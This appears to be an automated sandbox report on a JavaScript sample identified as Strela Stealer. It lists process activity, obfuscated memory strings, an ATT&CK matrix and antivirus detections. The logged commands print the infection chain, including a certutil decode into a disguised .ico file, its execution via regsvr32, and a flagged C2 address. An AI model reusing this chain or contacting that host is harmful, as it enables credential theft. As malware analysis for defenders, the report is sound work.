File created: C:\Users\user\childlikeclearintroduce.ico

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2778			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 650			Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

API coverage: 4.5 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6476	Thread sleep count: 2778 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6476	Thread sleep count: 650 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2496	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: wscript.exe, 00000000.00000003.1624787924.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1627801639.000002360BA31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624581776.000002360B939000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624662286.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1626812055.000002360BB31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1629087296.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1626643177.0000023609BE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624846199.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624919840.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000003.1639651754.000001F228648000.00000004.00000020.00020000.00000000.sdmp, file.js, deepdidacticfour.1.dr	Binary or memory string: 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
Source: wscript.exe, 00000000.00000003.1624787924.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1627801639.000002360BA31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624581776.000002360B939000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624662286.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1626812055.000002360BB31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1629087296.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1626643177.0000023609BE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624846199.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1624919840.000002360B96E000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000006.00000003.1639651754.000001F228648000.00000004.00000020.00020000.00000000.sdmp, file.js, deepdidacticfour.1.dr	Binary or memory string: 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tT0xTbmd6bG9WS0JuckNCZHBramZTSVVNeU9Ib2ZIQmdPUVlLZU1RV1hUTHJFVXNhWENWdbaSiJxqZFJvYkNIYXhIZm9oYWtXdE9zaGtac3RHT0dhcUhPbnNlUVhSVXBURHpFSHJTaUJzQ2lBUGhwRWt4a1lY4K9B3UlmT0dnaU1jT3FQcVFQR2N4WkNoYlJQd1FBS01QUk1ZbFV5dWhQSlljS1lCUFNjYXZMSFFrc1FGbmZvvw1XniW9jZttamNrcHpxSJu7u7dtWHd2YWZKd1ZPYWZ2bUJiVXZNcWFVRFVYWFBnkYycjkBtZ21BRVdjekF2cmRxU2J1UFpualB3UXJVcFhnakp4d0VaUnZVWXZ6b0NWbXpaZ3lHYUlCclhlUFhGVXJDTVpsQk1kZmdEWHdjbXh5a3FPQUFxR0FTUHBldEZBVW9PcVhGTElMcENpQ2JESVRcdURidVFpXHJJdWlUWllkV3llVUZwRkRRa1VMVXVoWk9zdUpJT09CWHBGSGR1eUdMR0pwdFZmZHp0Z1hlc3pXV0FvcExzdnhHVnlNY09tSUZMaVR4R0dSWndkV1ZXTG1nTUNTc2ZBT3dSd1V

Source: C:\Windows\System32\wbem\WMIC.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 8_2_00007FFE102314B0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

8_2_00007FFE102314B0

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_operatingsystem get oslanguage	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /i "1033"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V joyousintroducebreezy ""C:\Users\user\\stiffrelievedawesome.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode deepdidacticfour childlikeclearintroduce.ico	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell regsvr32 childlikeclearintroduce.ico	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Strela Stealer

Source: Yara match	File source: 8.2.regsvr32.exe.7ffe1023e734.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.7ffe1023e734.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.7ffe10230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1705298103.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5460, type: MEMORYSTR

Remote Access Functionality

Yara detected Strela Stealer

Source: Yara match	File source: 8.2.regsvr32.exe.7ffe1023e734.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.7ffe1023e734.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.regsvr32.exe.7ffe10230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1705298103.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5460, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	1 Native API	221 Scripting	11 Process Injection	121 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.js	21%	ReversingLabs	Script-JS.Trojan.Cryxos

Source	Detection	Scanner	Label	Link
45.9.74.12/server.php	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
45.9.74.12/server.php	true	Avira URL Cloud: malware	low

